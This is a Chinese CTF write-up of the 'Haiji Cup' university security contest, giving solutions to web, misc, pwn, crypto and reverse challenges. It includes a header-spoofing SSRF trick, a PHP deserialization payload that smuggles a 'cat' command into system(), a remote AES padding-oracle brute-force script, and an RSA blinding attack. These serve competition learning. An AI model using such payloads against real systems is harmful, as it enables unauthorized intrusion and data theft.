首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >“骇极杯”全国大学生网络安全邀请赛WriteUp

“骇极杯”全国大学生网络安全邀请赛WriteUp

作者头像
安恒网络空间安全讲武堂
发布2018-12-07 15:26:36
2K0
发布2018-12-07 15:26:36
举报

FIRST

“骇极杯”全国大学生网络安全邀请赛一手WriteUp

——特别感谢本文作者:flam4nplus——

本文作者多次参与“安恒杯”取得亮眼的成绩

在本次”骇极杯”中他所在的队伍取得了

rank 7、re和crypto均AK的好成绩

~Congratulations!

Web

web1

首先,burpsuite抓一波流量

将GET改为POST,并且post admin=1

访问robots.txt

发现有source.php和flag.php

访问flag.php无果,所以只能去看source.php

这里看到需要伪造ip 在头中伪造ip只有几种情况:xff xci clientip remoteaddr

这里添加X-Client-IP:127.0.0.1

继续post url

这里就能看到加载了图片

卡在这里好久,忽然想到因为是127.0.0.1会不会是file协议 进行尝试

发现还是会加载,在上面图片中也发现,不是jpg而是html 所以这里curl一下

顺便拿到了题目源码

<?php
error_reporting(0);
include "flag.php";
echo "you need to login as admin!";
echo "<!-- post param  'admin' -->";
if(isset($_POST['admin']))
{
    if($_POST['admin']==1)
    {
        if($_SERVER['HTTP_X_CLIENT_IP'])
        {
            if(isset($_POST['url']) && parse_url($_POST['url'])['host']=='www.ichunqiu.com')
            {
                $curl = curl_init();
                curl_setopt($curl, CURLOPT_URL, $_POST['url']);
                curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
                $content = curl_exec($curl);
                curl_close($curl);
                $filename='download/'.rand().';img1.jpg';
                file_put_contents($filename,$content);
                echo $_POST['url'];
                $img="<img src=\"".$filename."\"/>";
                echo $img;
            }
            else
            {
                echo "you need post url: http://www.ichunqiu.com";
            }
        }
        else
        {
            echo "only 127.0.0.1 can get the flag!!";
        }
    }

}
else
{
    $_POST['admin']=0;
}

顺带就拿到了flag

web2

这道题目首先用扫描软件扫到了泄漏的源码

<?php
error_reporting(0);
class come{    
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
    function __wakeup(){
        foreach($this->args as $k => $v) {
            $this->args[$k] = $this->waf(trim($v));
        }
    }
    function waf($str){
        $str=preg_replace("/[<>*;|?\n ]/","",$str);
        $str=str_replace('flag','',$str);
        return $str;
    }           
    function echo($host){
        system("echo $host");
    }
    function __destruct(){
        if (in_array($this->method, array("echo"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    } 

}

$first='hi';
$var='var';
$bbb='bbb';
$ccc='ccc';
$i=1;
foreach($_GET as $key => $value) {
        if($i===1)
        {
            $i++;   
            $$key = $value;
        }
        else{break;}
}
if($first==="doller")
{
    @parse_str($_GET['a']);
    if($var==="give")
    {
        if($bbb==="me")
        {
            if($ccc==="flag")
            {
                echo "<br>welcome!<br>";
                $come=@$_POST['come'];
                unserialize($come); 
            }
        }
        else
        {echo "<br>think about it<br>";}
    }
    else
    {
        echo "NO";
    }
}
else
{
    echo "Can you hack me?<br>";
}
?>

然后是反序列化漏洞

直接firefox f12 hackbar

http://8c2a8dee973d47ffbf0027140ec9e6dfc88e980052e84454.game.ichunqiu.com/?first=doller&a=var=give%26bbb=me%26ccc=flag

come=O%3A4%3A%22come%22%3A2%3A%7Bs%3A12%3A%22%00come%00method%22%3Bs%3A4%3A%22echo%22%3Bs%3A10%3A%22%00come%00args%22%3Ba%3A1%3A%7Bs%3A4%3A%22host%22%3Bs%3A20%3A%22123%26cat%24%7BIFS%7D%2Ffl%22%22ag%22%3B%7D%7D123

直接拿到flag

Misc

签到

很简单的base32,直接在线解密

MZWGCZ33GM2TEMRSMQZTALJUGM4WKLJUMFTGELJZGFTDILLBMJSWEYZXGNTGKMBVMN6Q

easy-py

此类型题目,正好在之前出过一道题,不过之前的WP写的太简单了,pyc的字节码忘的都差不多了。这次赶紧搜罗一波,把相关的东西保存一下。 参考链接如下: https://github.com/python/cpython/blob/master/Include/opcode.h https://bbs.pediy.com/thread-246683.htm https://das.scusec.org/2017/03/24/pythonopcode/ http://unpyc.sourceforge.net/Opcodes.html

整理之后的opcode如下:

03f3 0d0a 
bebc ce5b 
63
00 0000 00
00 000000
0f 0000 00
40 0000 00
73 
b200 0000  178长度
710600    JUMP_ABSOLUTE
642333    LOAD_CONST
710900    JUMP_ABSOLUTE       12个 
640000    LOAD_CONST  0   
640100    LOAD_CONST  1
640200    LOAD_CONST  2
640300    LOAD_CONST  3
640400    LOAD_CONST  4
640500    LOAD_CONST  5
640200    LOAD_CONST  2
640600    LOAD_CONST  6
640600    LOAD_CONST  6
640700    LOAD_CONST  7
640800    LOAD_CONST  8
640900    LOAD_CONST  9
640a00    LOAD_CONST  a
640b00    LOAD_CONST  b
640c00    LOAD_CONST  c


670f00    BUILD_LIST  f   cmp[0xf]
5a0000    STORE_NAME  0   
m[0xf]=[0,10,7,1,29,14.7,22,22,31,57,30,9,52,27]

650100    LOAD_NAME   1   raw_input
830000    CALL_FUNCTION   0
5a0200    STORE_NAME  2   flag

640000    LOAD_CONST  0   0
5a0300    STORE_NAME  3   m=0

{

785b00    SETUP_LOOP  while

650200    LOAD_NAME   2   flag
44        GET_ITER
5d5300    FOR_ITER
5a0400    STORE_NAME  4   i=..

650500    LOAD_NAME   5   ord
650400    LOAD_NAME   4   
830100    CALL_FUNCTION   ord(i)

0f         UNARY_INVERT  ~
640d00    LOAD_CONST  d       102
40        BINARY_AND  &

650500    LOAD_NAME   5
650400    LOAD_NAME   4
830100    CALL_FUNCTION   1 ord(i)
641200    LOAD_CONST  0x12    -103
40        BINARY_AND  &

42        BINARY_OR   |

5a0400    STORE_NAME  4   i=..
650400    LOAD_NAME   4   

650000    LOAD_NAME   0   cmp
650300     LOAD_NAME   3   m
19        BINARY_SUBSCR   []

6b0200    COMPARE_OP  2       ==  
7290 00    POP_JUMP_IF_FALSE

650300    LOAD_NAME   3   m
0b         UNARY_NEGATIVE -m
640e00    LOAD_CONST  0xe -1
17        BINARY_ADD  +
0b         UNARY_NEGATIVE -
5a0300    STORE_NAME  3   m=...

714900    JUMP_ABSOLUTE   

714900    JUMP_ABSOLUTE

640f00     LOAD_CONST  f wrong
47        PRINT_ITEM
48        PRINT_NEWLINE

650600    LOAD_NAME   6   exit
830000 CALL_FUNCTION    0
01        POP_TOP
714900 JUMP_ABSOLUTE
57        POP_BLOCK

641000    LOAD_CONST  right
47        PRINT_ITEM
48         PRINT_NEWLINE
641100
53        return


28        (STORE_SLICE
130000 00

69 
0000 0000 

69
0a 000000

69 
0700 0000 

69
0100 00 00
69 
1d00 0000 
69
0e00 00 00
69 
1600 0000 
69
1f 0000 00
69 
39000000 
69
1e 0000 00
69 
0900 0000 
69
34 000000
69 
1b00 0000 
69
66 0000 00
69 
ffff ffff

74
0500 00 00
7772 6f6e67 wrong
74
05 0000 00
7269 67 6874  right
4e69 99ff ffff 


28(
07 0000 00

74
0300 0000 
636d 70        cmp

74 
0900 0000 
7261 775f696e 7075 74 raw_input
74 
0400 0000 
666c 6167     flag
74
010000 00
6d             m
74
01 0000 00
69             i
74
03 0000 00
6f7264         ord

74
04 0000 00
65 7869 74    exit
)

28 
0000 0000

28
00 0000 00

28 
0000 0000 

73
0a 0000 00
65 6173 795f 7079 2e70 79    easy_py.pyc

74 
0800 0000 
3c6d 6f64 756c 653e     <module>

0100 0000 

73
14 0000 00
33 01 09 01 06 010d 011f 0110 010c 0106 0205 010b 02

在做的过程中,遇到了一个坑,网上的opcode不全导致

6b0200    COMPARE_OP  2       ==  
7290 00    POP_JUMP_IF_FALSE

一直不知道是什么,纠结了好久。 解密脚本如下:

cmp=[0,10,7,1,29,14,7,22,22,31,57,30,9,52,27]
flag=[]
j=0
for c in range(15):
    for i in range(255):
        if cmp[j] == ((~i)&102)|(i&(-103)):
            j=j+1
            flag.append(chr(i))
            break
print "".join(flag)

Pwn

aessss

拿到源码之后,发现unpad功能没有check,可以通过修改unpad来从后向前逐字节爆破,得到最后的flag。

脚本如下

from pwn import * 
import base64, time, random, string
from Crypto.Cipher import AES
from Crypto.Hash import SHA256, MD5

#context.log_level = 'debug'

def choice1():
    p.sendline('1')
    p.recvuntil('Here is the encrypted flag: 0x', drop = True)
    enflag = p.recvuntil('\nWelcome to AES(WXH) encrypt system.', drop = True)
    #print enflag
    p.recvuntil('Your choice:', drop = True)
    return enflag

def choice2(pad):
    p.sendline('2')
    p.recvuntil('Pad me something:', drop = True)
    p.sendline(pad)
    p.recvuntil('Your choice:', drop = True)

def bypassproof():
    p.recvuntil('sha256(XXXX+')
    lastdata = p.recvuntil(')', drop=True)
    print lastdata
    p.recvuntil(' == ')
    digest = p.recvuntil('\nGive me XXXX:', drop=True)
    print digest
    def proof(s):
        return SHA256.new(s + lastdata).hexdigest() == digest
    data = pwnlib.util.iters.mbruteforce(proof, string.ascii_letters + string.digits, 4, method='fixed')
    print data
    p.sendline(data)
    #p.recvuntil('Done!\n')

p = remote('106.75.13.64', 54321)
bypassproof()
p.recvuntil('Your choice:', drop = True)
flag_enc = choice1()
#print encflag
flag = ""
for i in range(33):
    a = ''.join(['a' for _ in range(223)])
    a = a[:-1] + chr(224 + i)
    for c in string.printable:
        #print c+flag
        choice2(a)
        choice2(c+flag)
        if choice1() == flag_enc:
            flag = c + flag
            print "success:"+flag
            break

Crypto

rsaaaa

首先要先proof 脚本如下

def brute_force(pad, shavalue):
dict = string.letters + string.digits
key = ""
for i1 in dict:
    tmp = key
    key1 = tmp + i1
    for i2 in dict:
        tmp = key1
        key2 = tmp + i2
        for i3 in dict:
            tmp = key2
            key3 = tmp + i3
            for i4 in dict:
                tmp = key3
                key4 = tmp + i4
                final_key = key4
                if sha512(pad+key4).hexdigest()==shavalue:
                    print key4
                    return key4
key_1 = brute_force('XkJ6v0Svif9H5wWd','6eb77ec24eee0fd5e59290c44acf22e377a3b08e33e0efa2bfd9971dbacf3e8a3bc32eed2fc710ddb26863f01dd82c63224fdc9851d9f9f46a9e6402c68206f5')
print key_1

随后要解决这里的问题

发现根本不需要求解他的d和n

直接d=1,n=c-m就好

直接进入下一关

这里需要做一个数学运算 先算cc = pow(2, e, n),然后算ccc = c*cc%n,然后把ccc发过去让服务器解密,拿到明文后除以2

得到的就是MM

post后直接进行aes解密,拿到flag

整个交互过程如下

sha512(XkJ6v0Svif9H5wWd+XXXX) == 6eb77ec24eee0fd5e59290c44acf22e377a3b08e33e0efa2bfd9971dbacf3e8a3bc32eed2fc710ddb26863f01dd82c63224fdc9851d9f9f46a9e6402c68206f5

Tell me XXXX:
ZTmx
OK, you proof.
Give you a message:0x6f57434e74344a6a4831485177694169
and its ciphertext:0xaef0ac66619ad00415bdf53f3232fffb1e19be5ae92b187f98544187f4021d9192b731f3bdedcf024310e918b6dcf052c6c13bca7587650806bcabcba0943ada57abfe8ec6aed1749ebf35d6c1716fd40c5fed105f1604caed170421b2e12efcb174b38bf2427331e2a22bdd4731c004c4d714a3a593b2cd0fd0031968526a4420ff2adfc0b752ddf9c2381e8cfd98f0471e820ee5ee8b83955730bc1087b12151ce0c65b4a90b84555c12db8053429ee6c40e7977b087829bec0e7dc42632d9c16a162500893ac635e3b6c4e1d3e34f069cbdc8183c19a28e400751ae1c9168d0689c0162ce59852170394eb881ab99130a4837422e5081143a2b62a3bc76d8
Please give me the private key to decrypt cipher
n:
22084145559267142542278247205711206806769035096867203562084376236135074979071593494695165415304475011906014512427242327757399235206725659075262541485105057336477881466546208394134375073948200202231086452529564372313656850419369453050936175671378881331075871605986332054320133956210417108252203550155296981956383715305509205993100035845876676100308496728282263311014876821564144113735314621093460404122348973685951350134860330087006324081818356485787747916004167088733576488568724106608053548411305492271813170870510029120401564662767509523812680234467117029176109380429489145638460342248988331319677739729495421826415
d:
1
Oh, how you know the private key!
n=0xac53a7e7f4a8ddb0d52b6df045527551d541a40365116ae66e9d8709442ffcfd786a8df7d203e117a709553d510edece5ae72c8e6f9a9552b4be987e6f2021f2a339930cdb221a8d484ea09df63c2a55f582b3c9ade2912c9650786e9f5c82973e2baea122cb895d06fa174a106d4660740f0c204666dc69168e330b2c41a78633bf24d48d023a6c0bdfa2f3761c4f38d081b5bf8c9ffd11abbe4d5be6e63f064125b3ead319c09242f5366124a0bfc8f73ba11a067a7904fec9c5497b3f376382427e3e60e95ae747cce634d721009cd13350b1cf2383c6880c05ff8ec7824339ea438ea800b5d15ec05fd0df7e53c569e1951560a75eb289f3afdf19beded1
e=0xcf90945cb5ed1485
c=0x9a9c94ec0094c5e3c1e1b6c2b534b637726cba2e8b0da0a2ba3f12cb98a225206755f13a7ae3e459489e253a6b4719645d741a48d3b47184a2bc8cc6be73b4040443821dc7796754cf5f40c3d9845f15f23486d50d06fdbcde6c017599703ac9ec6015ae61b67379f48272f4f84491506bc3e56eaf124c9b14584330657a26b4cc009c489441cafc3ed5555ff2f5806a5b56eb0d312dfea2ad985e37b5a3917f7930b492331bc1e12f71949ae7d76c53a44c5d9f7d25e8856aafd69f3b6bcfb44e5cf2fa9c09aa35bf4b6566c89f174d0c68abd8970aa41e1fe441c4b38c705979e33d5c9a2abf15560477c31b6346fcfc723289b9751f893fb7a8dac47de3f0

Now, you have a chance to decrypt something(but no c):
10861852131164322077412797986625616181717063053353581369663738748831496772954289381470035381197611133580693273961257855424019526480196780126545278666064266535981465755567420264745935227134754534350002537986969850551526328493939419096511440892423045037104987011041181269866090307965509267257918136812218547637066029308872688916113197541758600923169257485066711422003515732668822443487279464330075761022284709750952016470762309134261713817800958762289127439071427678699871872454105477099012449462911427691966935866152040055058801656487819090362844926572779942769475645537130146301058513228439997764047914117721832371520
message:0xce6adae4ac9ec86c8ee264a28ae2a46e
Give me right message:
137187895140717694653920589162394767927
Master in math!
Here is your flag:0x4af4a66ee3ff9bb620e20db7e0f3489bbf4bb358ad8d39a4a446ff4338570a241ec06f2d3703c7cfc1a1c6c0fce789e0

exp如下

#!/usr/bin/python
import random
import string
from hashlib import sha512
from Crypto.Util.number import *
from Crypto.Cipher import AES

'''
def brute_force(pad, shavalue):
    dict = string.letters + string.digits
    key = ""
    for i1 in dict:
        tmp = key
        key1 = tmp + i1
        for i2 in dict:
            tmp = key1
            key2 = tmp + i2
            for i3 in dict:
                tmp = key2
                key3 = tmp + i3
                for i4 in dict:
                    tmp = key3
                    key4 = tmp + i4
                    final_key = key4
                    if sha512(pad+key4).hexdigest()==shavalue:
                        print key4
                        return key4
key_1 = brute_force('XkJ6v0Svif9H5wWd','6eb77ec24eee0fd5e59290c44acf22e377a3b08e33e0efa2bfd9971dbacf3e8a3bc32eed2fc710ddb26863f01dd82c63224fdc9851d9f9f46a9e6402c68206f5')
print key_1


m = 0x6f57434e74344a6a4831485177694169
c = 0xaef0ac66619ad00415bdf53f3232fffb1e19be5ae92b187f98544187f4021d9192b731f3bdedcf024310e918b6dcf052c6c13bca7587650806bcabcba0943ada57abfe8ec6aed1749ebf35d6c1716fd40c5fed105f1604caed170421b2e12efcb174b38bf2427331e2a22bdd4731c004c4d714a3a593b2cd0fd0031968526a4420ff2adfc0b752ddf9c2381e8cfd98f0471e820ee5ee8b83955730bc1087b12151ce0c65b4a90b84555c12db8053429ee6c40e7977b087829bec0e7dc42632d9c16a162500893ac635e3b6c4e1d3e34f069cbdc8183c19a28e400751ae1c9168d0689c0162ce59852170394eb881ab99130a4837422e5081143a2b62a3bc76d8

print c-m





n=0xac53a7e7f4a8ddb0d52b6df045527551d541a40365116ae66e9d8709442ffcfd786a8df7d203e117a709553d510edece5ae72c8e6f9a9552b4be987e6f2021f2a339930cdb221a8d484ea09df63c2a55f582b3c9ade2912c9650786e9f5c82973e2baea122cb895d06fa174a106d4660740f0c204666dc69168e330b2c41a78633bf24d48d023a6c0bdfa2f3761c4f38d081b5bf8c9ffd11abbe4d5be6e63f064125b3ead319c09242f5366124a0bfc8f73ba11a067a7904fec9c5497b3f376382427e3e60e95ae747cce634d721009cd13350b1cf2383c6880c05ff8ec7824339ea438ea800b5d15ec05fd0df7e53c569e1951560a75eb289f3afdf19beded1
e=0xcf90945cb5ed1485
c=0x9a9c94ec0094c5e3c1e1b6c2b534b637726cba2e8b0da0a2ba3f12cb98a225206755f13a7ae3e459489e253a6b4719645d741a48d3b47184a2bc8cc6be73b4040443821dc7796754cf5f40c3d9845f15f23486d50d06fdbcde6c017599703ac9ec6015ae61b67379f48272f4f84491506bc3e56eaf124c9b14584330657a26b4cc009c489441cafc3ed5555ff2f5806a5b56eb0d312dfea2ad985e37b5a3917f7930b492331bc1e12f71949ae7d76c53a44c5d9f7d25e8856aafd69f3b6bcfb44e5cf2fa9c09aa35bf4b6566c89f174d0c68abd8970aa41e1fe441c4b38c705979e33d5c9a2abf15560477c31b6346fcfc723289b9751f893fb7a8dac47de3f0

cc = pow(2,e,n)
ccc = c*cc%n
print ccc

m = 0xce6adae4ac9ec86c8ee264a28ae2a46e

print m/2

'''
enc_flag = '4af4a66ee3ff9bb620e20db7e0f3489bbf4bb358ad8d39a4a446ff4338570a241ec06f2d3703c7cfc1a1c6c0fce789e0'
enc_flag = enc_flag.decode('hex')
msg1 = '6f57434e74344a6a4831485177694169'.decode('hex')
msg2 = '67356d72564f64364771325145715237'.decode('hex')
cipher = AES.new(msg2, AES.MODE_CBC, msg1)
dec = cipher.decrypt(enc_flag)

print dec

Reverse

cpp

签到题吧 对C++了解一点就不会感到那么陌生。

fake=[0x99, 0xb0, 0x87, 0x9e, 0x70, 0xe8, 0x41, 0x44, 0x05, 0x04, 0x8b, 0x9a, 0x74, 0xbc, 0x55, 0x58, 0xb5, 0x61, 0x8e, 0x36, 0xac, 0x09, 0x59, 0xe5,
 0x61, 0xdd, 0x3e, 0x3f, 0xb9, 0x15, 0xed, 0xd5]
a = 0x99
b = 0xb0
c = 0x87
d = 0x9e
flag=[]

src=[0 for i in range(32)]
xor1=[0 for i in range(32)]
xor2=[0 for i in range(32)]
xor3=[0 for i in range(32)]
xor4=[0 for i in range(32)]
src[0]=a
src[1]=b
src[2]=c
src[3]=d

xor1[0]=a
xor1[1]=b^a
xor1[2]=a^b^c
xor1[3]=a^b^c^d

xor2[0]=a
xor2[1]=b
xor2[2]=a^c
xor2[3]=d^b

xor3[0]=a
xor3[1]=a^b
xor3[2]=c^b
xor3[3]=d^c

xor4[0]=a
xor4[1]=b
xor4[2]=c
xor4[3]=d

for i in range(4,32):
    for j in range(255):
        src[i]=j
        xor1[i]=(xor1[i-1]^src[i])&0xff
        xor2[i]=(xor2[i-1]^xor1[i])&0xff
        xor3[i]=(xor3[i-1]^xor2[i])&0xff
        xor4[i]=(xor4[i-1]^xor3[i])&0xff
        if xor4[i]==fake[i]:
            break

for i in range(32):
    for j in range(256):
        tmp = j*4
        result = (((j>>6)|tmp)^i)&0xff
        if result == src[i]:
            flag.append(chr(j))
            break
print "".join(flag)#flag{W0w_y0u_m4st3r_C_p1us_p1us}

flag{W0w_y0u_m4st3r_C_p1us_p1us}

cyvm

最后的时候才放出来,非常简单的vm题 bytecode如下:

op    d1  d2
[0x0F,                      scanf(%s)   s
0x10, 0x14, 0x20,            r0=0x20
0x10, 0x16, 0x00,             r2=0
0x09, 0x24,                 point=0x24  jmp code[0x24]
label code[0x9]:
0x02, 0x15, 0x16,             r1=s[r2]            r2=0    r1=s[0]
0xE9,                         ++i
0x12, 0x16,                 v2 = 2  r2++        r2=1
0xE8,                         ++i
0x02, 0x17, 0x16,             r3=s[r2]                    r3=s[1]
0x13, 0x16,                 v3 = 2  r2--        r2=0
0x90,                         ++i
0x06, 0x15, 0x17,             r1=r1^r3            r1=s[0]^s[1]
0x45,                         ++i
0x06, 0x15, 0x16,             r1=r1^r2            r1=s[0]^s[1]^r2
0x76,                         ++i
0x01, 0x15, 0x16,             s[r1]=r2            s[r1]=0
0x12, 0x16,                 v2=2    r2++
0xFF,                         ++i

label code[0x24]:
0x0A, 0x14, 0x16,            v9  = r0 != r2

0x0C, 0x09,                    if(v9) true point = d1
0x0E                        sub_4006d6()!=0

解密脚本:

c = [0x0A, 0x0C, 0x04, 0x1F, 0x48, 0x5A, 0x5F, 0x03, 0x62, 0x67, 0x0E, 0x61, 0x1E, 0x19, 0x08, 0x36, 0x47, 0x52, 0x13, 0x57, 0x7C, 0x39, 0x54, 0x4B, 0x05, 0x05, 0x45, 0x77, 0x15, 0x26, 0x0E, 0x62]


# flag=[]
def encode():
    flag='a'*0x20
    for i in range(32):
        c[i]=flag[i]^flag[i+1]^i


def decode():
    flag=["}"]
    a=[]
    tmp = 125
    for i in range(30,-1,-1):
        tmp = c[i]^tmp^i
        flag.append(chr(tmp))
    print "".join(flag[::-1])

decode()

flag{7h15_15_MY_f1rs7_s1mpl3_Vm}

What's_it

前面一部分a-z 6位md5爆破出luck string ozulmt 然后会进入自解码部分,接下来才是真正的验证flag的部分,首先是验证flag格式,并且格式化后之后提取出来,最后同固定数据进行比较即可! 爆破脚本如下:

import hashlib
import string
dic = string.ascii_lowercase
may_fla = []
for i in dic:
    for j in dic:
        for m in dic:
            for n in dic:
                for p in dic:
                    for q in dic:
                        flag=i+j+m+n+p+q
                        # print flag
                        hl = hashlib.md5()
                        hl.update(flag.encode(encoding='utf-8'))
                        flag_md5 = hl.hexdigest()
                        count=0
                        index_sum=0
                        for c in range(32):
                            if flag_md5[c] == '0':
                                count = count+1
                                index_sum = index_sum+c
                        if (10*count+index_sum) == 403:
                            may_fla.append(flag)
print may_fla

解密脚本如下:

# flag{aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}
# flag="flag{"
# flag[13]="-"
# flag[18]="-"
# flag[28]="-"
# flag[23]="-"
# flag[41]="}"

c=[0x61, 0x31, 0x39, 0x37, 0x62, 0x38, 0x34, 0x37, 0x37, 0x30, 0x39, 0x32, 0x35, 0x33, 0x61, 0x34, 0x37, 0x63, 0x34, 0x31, 0x62, 0x63, 0x37, 0x64, 0x36, 0x64, 0x35, 0x32, 0x65, 0x36, 0x39, 0x64]
flag = []

for i in c:
    flag.append(chr(i))
print "".join(flag)# flag{a197b847-7092-53a4-7c41-bc7d6d52e69d}
本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2018-11-07,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 恒星EDU 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • Web
    • web1
      • web2
      • Misc
        • 签到
          • easy-py
          • Pwn
            • aessss
            • Crypto
              • rsaaaa
              • Reverse
                • cpp
                  • cyvm
                    • What's_it
                    领券
                    问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档